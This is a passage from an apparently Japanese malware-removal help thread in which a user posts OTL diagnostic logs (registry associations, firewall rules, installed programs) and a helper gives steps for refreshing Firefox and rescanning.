SRV:[b]64bit:[/b] - [2014/10/29 10:18:13 | 000,230,400 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wbem\WMIsvc.dll -- (Winmgmt)
SRV:[b]64bit:[/b] - [2015/03/14 09:22:58 | 003,678,720 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wuaueng.dll -- (wuauserv)
SRV:[b]64bit:[/b] - [2014/10/29 10:53:17 | 000,262,144 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\dot3svc.dll -- (dot3svc)
SRV:[b]64bit:[/b] - [2014/10/29 10:03:56 | 001,547,264 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wlansvc.dll -- (WlanSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:24:29 | 000,289,280 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\wkssvc.dll -- (LanmanWorkstation)

[color=#A23BEC]< %SYSTEMDRIVE%\*.exe >[/color]
[2007/11/20 23:08:08 | 000,562,688 | ---- | M] (Microsoft Corporation) -- C:\install.exe
[2010/07/08 01:11:00 | 000,183,296 | R--- | M] (I-O DATA DEVICE,INC.) -- C:\IOOCI.EXE

[color=#E56717]========== Files - Unicode (All) ==========[/color]
(C:\Users\ryota\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\傲游??器 3) -- C:\Users\ryota\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\傲游浏览器 3

[color=#E56717]========== Alternate Data Streams ==========[/color]

@Alternate Data Stream - 118 bytes -> C:\ProgramData\Temp:373E1720

< End of report >

以上で取得したログはすべてですが、ＯＴＬのログを取得した際にExtras.Txtというメモファイルが同時に取得しましたが必要なようでしたら再度貼らせて頂きます。

ログを確認いたしましたが、既に莫大な量の感染が確認できてます。
しかしOTL.txtよりどちらかと言うとExtras.txtの方が重要になってきますので、
こちらは必ず貼り付けてご連絡ください。

そしてFirefoxに厄介な設定が残っていますので、まずはこちらのリフレッシュから行いましょう。
Firefoxを起動させ、三のマークのメニューを開きます。
？マークのヘルプメニューをクリックし、トラブルシューティング情報を開きます。
Firefoxをリフレッシュのボタンを押してリフレッシュを行ってください。
その後再度OTLでスキャンを行い、最初に出力されたExtras.txtと新たに出力されたOTL.txtを貼り付けてご連絡ください。

了解しました。
先にExtras.txt のログを貼っておきます。
OTL Extras logfile created on: 2015/04/21 1:47:20 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\ryota\Desktop
64bit- An unknown product (Version = 6.3.9600) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17728)
Locale: 00000411 | Country: 日本 | Language: JPN | Date Format: yyyy/MM/dd

7.88 Gb Total Physical Memory | 6.58 Gb Available Physical Memory | 83.54% Memory free
9.13 Gb Paging File | 7.90 Gb Available in Paging File | 86.54% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 456.99 Gb Total Space | 35.25 Gb Free Space | 7.71% Space Free | Partition Type: NTFS

Computer Name: NAMETUKI | User Name: ryota | Logged in as Administrator.
Boot Mode: SafeMode | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

[color=#E56717]========== Extra Registry (SafeList) ==========[/color]


[color=#E56717]========== File Associations ==========[/color]

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.html[@ = htmlfile] -- C:\Program Files\Internet Explorer\IEXPLORE.EXE (Microsoft Corporation)
.url[@ = InternetShortcut] -- C:\WINDOWS\SysNative\rundll32.exe (Microsoft Corporation)

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\WINDOWS\SysWow64\control.exe (Microsoft Corporation)
.html [@ = htmlfile] -- C:\Program Files\Internet Explorer\IEXPLORE.EXE (Microsoft Corporation)

[HKEY_USERS\S-1-5-21-1488747381-3182991089-3951260014-1001\SOFTWARE\Classes\<extension>]
.html [@ = ChromeHTML] -- Reg Error: Key error. File not found

[color=#E56717]========== Shell Spawning ==========[/color]

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [edit] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\IEXPLORE.EXE" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\IEXPLORE.EXE" %1 (Microsoft Corporation)
htmlfile [print] -- "C:\WINDOWS\system32\rundll32.exe" "C:\WINDOWS\system32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)
http [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
https [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
InternetShortcut [open] -- "C:\WINDOWS\system32\rundll32.exe" "C:\WINDOWS\system32\ieframe.dll",OpenURL %l (Microsoft Corporation)
InternetShortcut [print] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\OpenWith.exe "%1" (Microsoft Corporation)
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\IEXPLORE.EXE" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- "C:\Program Files\Internet Explorer\iexplore.exe" (Microsoft Corporation)

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [edit] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\IEXPLORE.EXE" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\IEXPLORE.EXE" %1 (Microsoft Corporation)
http [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
https [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\OpenWith.exe "%1" (Microsoft Corporation)
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\IEXPLORE.EXE" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- Reg Error: Value error.

[color=#E56717]========== Security Center Settings ==========[/color]

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 0

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"VistaSp1" = AC 1C AE C5 46 9F CE 01 [binary data]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Upgrade]
"UpgradeTime" = [binary data]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Upgrade]
"UpgradeTime" = Reg Error: Unknown registry data type -- File not found

[color=#E56717]========== Firewall Settings ==========[/color]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
"DoNotAllowExceptions" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
"DoNotAllowExceptions" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
"DoNotAllowExceptions" = 0

[color=#E56717]========== Authorized Applications List ==========[/color]


[color=#E56717]========== Vista Active Open Ports Exception List ==========[/color]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]

[color=#E56717]========== Vista Active Application Exception List ==========[/color]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{009099D3-EA5F-4753-922B-BBC861E62234}" = protocol=17 | dir=in | app=c:\program files (x86)\mozilla firefox\firefox.exe |
"{01503B34-1D0D-4851-AE1E-F6235AB60B6D}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\bin\steamwebhelper.exe |
"{0794E7E3-08AC-4E18-A08A-96D5910E1D96}" = protocol=17 | dir=in | app=c:\program files (x86)\maxthon3\bin\maxthon.exe |
"{07C938AA-F54B-468F-8A11-4C3CD7FE6D72}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\age2hd\launcher.exe |
"{08AAB086-AB6F-43DE-A154-803165802B85}" = dir=out | name=windows_ie_ac_001 |
"{0BB8AC33-4C3D-426C-8439-A58A243DDC61}" = protocol=17 | dir=in | app=c:\users\ryota\downloads\utorrent.exe |
"{0C4FFAB4-C30E-4DAE-8FC0-209BE23F0567}" = protocol=17 | dir=in | app=c:\program files (x86)\maxthon3\modules\mxminithunder\thundermini.exe |
"{0D33A481-D37D-400E-983F-C556CA957413}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steam.exe |
"{118CA08C-7527-4138-B10B-61CE7D7A7AB7}" = dir=out | name=@{microsoft.bingnews_1.2.0.135_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingnews/resources/news} |
"{14D799F3-5410-494D-8FD3-02501D10B9E6}" = dir=out | name=@{microsoft.reader_6.2.8516.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.reader/resources/shortdisplayname} |
"{1A906073-519D-4B77-8F4E-19CE44CA9EC5}" = protocol=6 | dir=in | app=c:\windows\system32\arfc\wrtc.exe |
"{210AA50F-D6BA-4A65-9C41-303E2E335D3F}" = dir=out | name=@{microsoft.bingfoodanddrink_3.0.4.313_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingfoodanddrink/resources/apptitlewithbranding} |
"{21E05156-F8E3-4500-9677-9BB6B6F22984}" = dir=out | name=@{microsoft.binghealthandfitness_3.0.4.309_x64__8wekyb3d8bbwe?ms-resource://microsoft.binghealthandfitness/resources/apptitle} |
"{22A77403-B354-46CE-8C90-8938EF20012C}" = dir=out | name=windows_ie_ac_001 |
"{2E0932F0-D12C-477D-B5E1-83DF03447ED8}" = dir=in | name=@{microsoft.windowsreadinglist_6.3.9654.20540_x64__8wekyb3d8bbwe?ms-resource://microsoft.windowsreadinglist/resources/apppackagename} |
"{2F9CEED4-58E8-42D6-8102-B5D444F908B9}" = protocol=17 | dir=in | app=c:\program files (x86)\maxthon3\bin\mxup.exe |
"{325804B3-4C52-45BA-A270-2B1888F9B611}" = protocol=17 | dir=in | app=c:\nexon\talesweaver\inphasenxd.exe |
"{346C9C59-91EE-44C6-99A2-E663E8390F50}" = dir=out | name=@{microsoft.windowscommunicationsapps_17.0.1119.516_x64__8wekyb3d8bbwe?ms-resource://microsoft.windowscommunicationsapps/resources/communicationspackagename} |
"{3CA7E038-2B5E-48C7-9FF0-05D045E607D4}" = dir=out | name=@{microsoft.zunemusic_2.6.672.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.zunemusic/resources/ids_manifest_music_app_name} |
"{3DD1F688-6FA9-4923-8337-7E1289BDAE8B}" = dir=out | name=@{microsoft.bingweather_3.0.4.298_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingweather/resources/brandedapptitle} |
"{3EE68DC6-786E-43D5-9C0F-E1A182DF1B62}" = dir=out | name=@{microsoft.bingtravel_3.0.4.309_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingtravel/resources/brandedapptitle} |
"{41ECA379-9074-4EE1-928B-46DF51AFEBB3}" = dir=in | name=onenote |
"{4282FE99-8560-4BC7-9576-5F3ED84E263F}" = dir=in | name=checkpoint.vpn |
"{44E6995E-9E85-4A20-86A7-8FF9C8F374E5}" = dir=in | name=check point vpn |
"{47F6BBF7-2074-4CC5-A3CF-85A61EE9FB7C}" = dir=in | name=juniper networks junos pulse |
"{48A40ABC-7AAD-4F73-8CCE-2FD72215616C}" = dir=out | name=@{microsoft.xboxlivegames_1.0.927.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.xboxlivegames/resources/34150} |
"{4A95F02E-910A-416E-8DF3-70DA09C188B0}" = dir=in | app=c:\gameon\archeage\bin32\patcher.exe |
"{4AECD572-300B-4486-A703-D5A7C94722B6}" = protocol=6 | dir=in | app=c:\users\ryota\appdata\roaming\xlgames\xlkcsdownload_jp\xlkcsdownload_jp.exe |
"{4BB56D50-0173-49B5-80AB-9C93C8B7F376}" = dir=out | name=@{microsoft.zunevideo_2.6.439.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.zunevideo/resources/ids_manifest_video_app_name} |
"{4D028C29-2A66-4D21-B069-C9B4F45C4F38}" = protocol=6 | dir=in | app=c:\x-legend\genshin\game.bin |
"{4F3DFDB5-0D90-4943-90B1-92B2A09E6B78}" = protocol=6 | dir=in | app=c:\programdata\nexonjp\ngm\ngm.exe |
"{548DCF8C-BFF2-4BA4-AA88-FBAF9AC8BCC6}" = dir=in | name=@{c:\windows\winstore\resources.pri?ms-resource://winstore/resources/displayname} |
"{560448D6-095C-4907-B046-AC7F710701A7}" = dir=in | name=sonicwall.mobileconnect |
"{5812DF6F-6B13-49D7-9A04-2DF6F2FC2505}" = dir=out | name=@{microsoft.bingtravel_1.2.0.145_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingtravel/resources/apptitle} |
"{58F515B0-A0AF-4B94-9C01-387DA208C55E}" = dir=in | name=@{microsoft.reader_6.2.8516.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.reader/resources/shortdisplayname} |
"{5F4632C0-D5B1-40C3-B0D9-E3A759C81B9E}" = dir=out | name=sonicwall.mobileconnect |
"{67610D71-5A2C-4315-B346-AA5BE03D5705}" = dir=out | name=skype |
"{67C713B4-BD9F-439A-861E-00790CEE951D}" = protocol=17 | dir=in | app=c:\program files (x86)\maxthon3\bin\maxthon.exe |
"{6D25CB15-AAC4-4EF2-BFEF-5A0CA80F6C13}" = dir=out | name=@{microsoft.bingmaps_2.1.3230.2048_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingmaps/resources/appdisplayname} |
"{6DD87F49-B93F-40E4-B6E8-8F998CB3BD57}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{6FE1A57A-8E2E-40D9-B61A-272EA4B8188C}" = protocol=17 | dir=in | app=c:\users\ryota\appdata\roaming\xlgames\xlkcsdownload_jp\xlkcsdownload_jp.exe |
"{76CE7216-802A-43BA-BB1C-225CB7CE7C05}" = protocol=6 | dir=in | app=c:\program files (x86)\maxthon3\bin\maxthon.exe |
"{79F84839-B842-454A-91A4-1C9E3176E337}" = dir=in | name=@{microsoft.windowscommunicationsapps_17.0.1119.516_x64__8wekyb3d8bbwe?ms-resource://microsoft.windowscommunicationsapps/resources/communicationspackagename} |
"{7A9FEC2A-DDE1-4CE6-97EC-2F949B5526FE}" = dir=out | name=f5 vpn |
"{7DBB95E5-37D6-481E-8FF0-7783952AF05F}" = dir=out | name=@{microsoft.xboxlivegames_2.0.139.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.xboxlivegames/resources/34150} |
"{7E8F1B59-2239-4BBC-8755-6B3D95FD9DD6}" = dir=in | name=f5 vpn |
"{808F1451-4108-46FD-ADBB-F17324B5F0BD}" = dir=out | name=@{c:\windows\winstore\resources.pri?ms-resource://winstore/resources/displayname} |
"{8406D4F5-256C-43E5-A90C-0915D5C65380}" = dir=in | name=sonicwall mobile connect |
"{851380EB-0379-4378-BF16-F67C424904B1}" = dir=out | name=sonicwall mobile connect |
"{85FBE51D-AA48-4E64-893B-54C714543CA1}" = dir=out | name=@{microsoft.zunevideo_1.5.802.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.zunevideo/resources/ids_manifest_video_app_name} |
"{88FB3814-4513-4CBC-A873-B0565593EE8C}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\bin\steamwebhelper.exe |
"{8EBA722B-09CB-4FB2-A1BC-6CDEDCFD99BD}" = protocol=6 | dir=in | app=c:\program files (x86)\maxthon3\bin\maxthon.exe |
"{9503C259-12DD-4649-8CDA-6E4809E16AE9}" = protocol=17 | dir=in | app=c:\hangame\japanese\goldwing\game.exe |
"{9740BE23-0938-4BE8-BA8B-B19AEF8CCCD2}" = dir=out | name=@{microsoft.bingweather_1.2.0.135_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingweather/resources/apptitle} |
"{9C8F71E3-B323-4721-95F2-40A687DC9B15}" = dir=out | name=@{microsoft.bingfinance_3.0.4.298_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingfinance/resources/brandedapptitle} |
"{9CC63241-376E-4B47-9B74-7DCEEBD4C269}" = dir=out | name=@{microsoft.bingfinance_1.2.0.135_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingfinance/resources/apptitle} |
"{9E3D57FC-7C37-4424-9352-4831E97D029D}" = dir=out | name=@{c:\windows\winstore\resources.pri?ms-resource://winstore/resources/displayname} |
"{A3A01DAC-93C5-4C92-925C-2A0870197B4F}" = dir=out | name=@{microsoft.bingsports_1.2.0.135_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingsports/resources/bingsports} |
"{A57F4810-E33D-48B9-8CD6-F41DC29CE35A}" = dir=out | name=windows_ie_ac_001 |
"{A899EF9B-C249-42C9-980D-E60A6109B2C3}" = dir=out | name=@{microsoft.bingnews_3.0.4.268_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingnews/resources/brandedapptitle} |
"{AE2227F9-370C-4BB4-AB89-074B2699E94C}" = dir=out | name=@{microsoft.zunemusic_1.0.927.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.zunemusic/resources/33273} |
"{B1758FE6-CF15-4E73-876D-FFFA588AA083}" = protocol=6 | dir=in | app=c:\hanpurple\dnest\dragonnest.exe |
"{BC3CFB2F-5334-4003-B754-9F8BBD34068A}" = dir=out | name=@{microsoft.windowsreadinglist_6.3.9654.20540_x64__8wekyb3d8bbwe?ms-resource://microsoft.windowsreadinglist/resources/apppackagename} |
"{BF0B3553-784A-4EE0-A754-E2D38153E48E}" = dir=in | name=skype |
"{C8686564-1AED-42A5-A078-2A7D9FD17165}" = dir=out | name=@{microsoft.bingmaps_1.2.0.136_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingmaps/resources/appdisplayname} |
"{CAFB1352-EBDD-4C41-8F64-4B9CEA699B4F}" = protocol=6 | dir=in | app=c:\program files (x86)\mozilla firefox\firefox.exe |
"{CB29A369-30CE-46A5-9934-278594A971BB}" = protocol=6 | dir=in | app=c:\nexon\talesweaver\inphasenxd.exe |
"{CD460E5F-1B4F-4C07-B99D-5DF1F33B4F13}" = protocol=17 | dir=in | app=c:\programdata\nexonjp\ngm\ngm.exe |
"{CF427883-F6F5-4AAD-8F75-0F160842B0EA}" = dir=out | name=@{microsoft.windowscommunicationsapps_17.5.9600.20689_x64__8wekyb3d8bbwe?ms-resource://microsoft.windowscommunicationsapps/resources/communicationspackagename} |
"{D1BA3E33-5488-462A-9C0C-4880B3F7CDBE}" = protocol=17 | dir=in | app=c:\windows\system32\arfc\wrtc.exe |
"{D6980480-941A-4DF6-AB81-3734ECD3D779}" = dir=out | name=junipernetworks.junospulsevpn |
"{D76D9E58-C01A-473F-A7CB-47785C4C2E82}" = protocol=6 | dir=in | app=c:\program files (x86)\maxthon3\bin\mxup.exe |
"{DB59588E-ED90-4C47-A7B5-7929DD0C0BD2}" = dir=out | name=checkpoint.vpn |
"{DBECC510-D1DD-454B-85CD-97313FBD73EB}" = dir=out | name=@{microsoft.bingsports_3.0.4.298_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingsports/resources/brandedapptitle} |
"{DCD48588-DEA0-4613-963F-BC8CC77C49BC}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\age2hd\launcher.exe |
"{DCD948A7-1D06-4871-9792-B2752D45583F}" = dir=out | name=check point vpn |
"{DF499B6B-9406-4233-B8CE-C13A3DFC521E}" = protocol=6 | dir=in | app=c:\program files (x86)\maxthon3\modules\mxminithunder\thundermini.exe |
"{E0D4F4A4-50DB-4E61-A9A6-97D2145A436B}" = protocol=17 | dir=in | app=c:\windows\system32\dmwu.exe |
"{E4C3F353-F3AD-497D-AE4C-2E0C296265E3}" = protocol=6 | dir=in | app=c:\hangame\japanese\goldwing\game.exe |
"{E6A917C9-2D7C-44DA-ADC3-F27BAC54466A}" = protocol=6 | dir=in | app=c:\windows\system32\dmwu.exe |
"{E6B916CF-2E4B-4E04-A2D0-24AF907AFED6}" = protocol=6 | dir=in | app=c:\users\ryota\downloads\utorrent.exe |
"{E7985E1D-C36F-4787-80A8-6350D07E9266}" = dir=in | name=@{c:\windows\winstore\resources.pri?ms-resource://winstore/resources/displayname} |
"{EC799E33-72BA-42D7-9127-DEFE68F9799D}" = dir=in | name=junipernetworks.junospulsevpn |
"{EFCF6019-F00D-46D9-9568-FC9EDD5193DE}" = dir=out | name=juniper networks junos pulse |
"{F0814EEE-9BD1-4B78-BA85-D63612A6227D}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steam.exe |
"{F1DFDFB7-40CA-48F0-8D06-BB59F49CC5A5}" = protocol=17 | dir=in | app=c:\nexon\suddenattack\suddenattack.exe |
"{F64300AD-D559-4000-BD45-0997BCC8E70A}" = dir=out | name=f5.vpn.client |
"{F6E9C483-518F-4BA7-BE4E-18648C6C864E}" = protocol=6 | dir=in | app=c:\nexon\suddenattack\suddenattack.exe |
"{F77E5446-4378-4E99-8B7A-7061AAAEA193}" = dir=in | name=f5.vpn.client |
"{FAD92456-5BB0-48C9-B2CB-9DBFF3B7D09B}" = dir=in | app=c:\users\ryota\appdata\local\microsoft\skydrive\skydrive.exe |
"{FAFE2CDC-A429-42D3-8523-6605AF848939}" = protocol=17 | dir=in | app=c:\hanpurple\dnest\dragonnest.exe |
"{FD921E2A-65D4-4167-AFA4-DC2516117E3B}" = dir=out | name=onenote |
"{FE80C7E8-BDE8-4A38-9DCD-19C3B3279627}" = protocol=17 | dir=in | app=c:\x-legend\genshin\game.bin |
"{FEC124A2-8A36-4429-B6E5-69606B431A45}" = dir=in | app=c:\program files (x86)\itunes\itunes.exe |
"{FEF57493-E3E4-46BE-B716-C6194636F110}" = dir=in | name=@{microsoft.windowscommunicationsapps_17.5.9600.20689_x64__8wekyb3d8bbwe?ms-resource://microsoft.windowscommunicationsapps/resources/communicationspackagename} |
"TCP Query User{1B62F5B2-E035-4CAC-89D1-AB5CD5F2FA58}C:\program files (x86)\microsoft games\age of empires ii\age2_x1\age2_x1.icd" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft games\age of empires ii\age2_x1\age2_x1.icd |
"TCP Query User{5D33A37A-B027-42EB-A52A-F66CA11D904E}C:\users\ryota\desktop\bluff\bluff.exe" = protocol=6 | dir=in | app=c:\users\ryota\desktop\bluff\bluff.exe |
"TCP Query User{66DEA66C-65DC-401C-A8BC-D2C3958F5C25}C:\windows\downloaded program files\plauncher.exe" = protocol=6 | dir=in | app=c:\windows\downloaded program files\plauncher.exe |
"TCP Query User{B53C7C76-8A3C-46CD-AE85-FC73C4DB66D3}C:\program files (x86)\mozilla firefox\firefox.exe" = protocol=6 | dir=in | app=c:\program files (x86)\mozilla firefox\firefox.exe |
"TCP Query User{B91BCF46-2455-4390-9659-D1523BCF5883}C:\nexon\talesweaver\talesweaver.exe" = protocol=6 | dir=in | app=c:\nexon\talesweaver\talesweaver.exe |
"TCP Query User{C0B057B5-CB88-4A89-9643-0181FD4BFD9B}C:\hangame\arad\arad.exe" = protocol=6 | dir=in | app=c:\hangame\arad\arad.exe |
"UDP Query User{23E0F26C-D8BC-4DAA-B721-AF2C7FCF668E}C:\windows\downloaded program files\plauncher.exe" = protocol=17 | dir=in | app=c:\windows\downloaded program files\plauncher.exe |
"UDP Query User{275D5791-F993-4252-BDC3-BBA0D5741839}C:\nexon\talesweaver\talesweaver.exe" = protocol=17 | dir=in | app=c:\nexon\talesweaver\talesweaver.exe |
"UDP Query User{4EB623EB-C127-4E8D-8B88-D3E06BEAA1A9}C:\hangame\arad\arad.exe" = protocol=17 | dir=in | app=c:\hangame\arad\arad.exe |
"UDP Query User{556839B5-2CFB-450A-9B71-38C85B89F9F7}C:\program files (x86)\microsoft games\age of empires ii\age2_x1\age2_x1.icd" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft games\age of empires ii\age2_x1\age2_x1.icd |
"UDP Query User{DA29FC43-1442-49EB-B01F-F3A967F386E3}C:\program files (x86)\mozilla firefox\firefox.exe" = protocol=17 | dir=in | app=c:\program files (x86)\mozilla firefox\firefox.exe |
"UDP Query User{EEB81633-0C5D-4ECD-9A23-ACB55A76545A}C:\users\ryota\desktop\bluff\bluff.exe" = protocol=17 | dir=in | app=c:\users\ryota\desktop\bluff\bluff.exe |

[color=#E56717]========== HKEY_LOCAL_MACHINE Uninstall List ==========[/color]

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{1B2C85A0-2B9E-4291-8B37-468D57503E98}" = Update for Japanese Microsoft IME Postal Code Dictionary
"{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" = Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219
"{2EDC2FA3-1F34-34E5-9085-588C9EFD1CC6}" = Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.60610
"{4DF9BC73-D405-4C3B-A0EA-1E390A8AFC73}" = Update for Japanese Microsoft IME Standard Dictionary
"{6A1E4EFB-3EE0-40A0-9D6D-E865370289DB}" = Google 日本語入力
"{764384C5-BCA9-307C-9AAC-FD443662686A}" = Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.60610
"{977D1ABF-4089-4CA7-BA33-CC75808B7ACE}" = Intel® Trusted Connect Service Client
"{B678797F-DF38-4556-8A31-8B818E261868}" = Apple Mobile Device Support
"{B939BFEB-824F-4456-A4EE-2B86ED04033D}" = Update for Japanese Microsoft IME Trending Words Dictionary
"{E9F0BCD8-6BD5-1ED7-EDA3-9FCF2A478AA1}" = Microsoft App Update for microsoft.windowscommunicationsapps_17.0.1119.516_x64__8wekyb3d8bbwe (x64)
"{F46AA0F1-E284-4878-A462-5F11B9166C0E}" = iTunes
"CCleaner" = CCleaner
"utvideo_is1" = Ut Video Codec Suite

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{0659E943-DDF4-44FC-9FEE-A13B09F8BB08}" = Adobe Flash Media Live Encoder 3.2
"{111EE7DF-FC45-40C7-98A7-753AC46B12FB}" = QuickTime 7
"{15015752-9990-4516-A2B1-93823281FB8E}" = Update for Japanese Microsoft IME Postal Code Dictionary
"{20D4A895-748C-4D88-871C-FDB1695B0169}" = Platform
"{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}" = Skype(TM) 7.3
"{33F7A957-A66D-45A1-BADF-6576083B14E2}" = RPGツクール2000 ランタイムパッケージ
"{3CCC5A1C-3DDF-4126-B9DC-EDFC6A0E16A0}" = Hounds
"{3D6AD258-61EA-35F5-812C-B7A02152996E}" = Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.60610
"{402ED4A1-8F5B-387A-8688-997ABF58B8F2}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729
